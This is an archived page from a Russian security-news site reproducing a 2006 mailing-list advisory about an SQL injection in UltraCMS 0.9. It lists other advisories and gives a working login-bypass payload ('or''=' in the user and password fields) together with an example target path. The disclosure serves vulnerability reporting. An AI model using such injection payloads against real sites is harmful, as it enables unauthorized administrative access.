Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [KAPDA::#60] Mambo V4.6.x vulnerabilities

  PHP Poll Creator 1.04 (poll_vote.
php)File Include

  Advisory for Oneorzero helpdesk

  PHPLibrary-1.5.
3(Description.
php) Remote File Include

From:fireboy2006_(at)_gmail.com <fireboy2006_(at)_gmail.com>
Date:21 октября 2006 г.
Subject:UltraCMS 0.9 sql injection

****************************
* Tunis the 18 October 2006*
* bug found by fireboy *
****************************
product:UltraCMS 0.9

there is an sql injection problem in UltraCMS 0.9 and it can be exploited to gain admin privileges.

exploit:
user: 'or''='
pass: 'or''='

example : http://www.target.com/include/index.php

thx

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород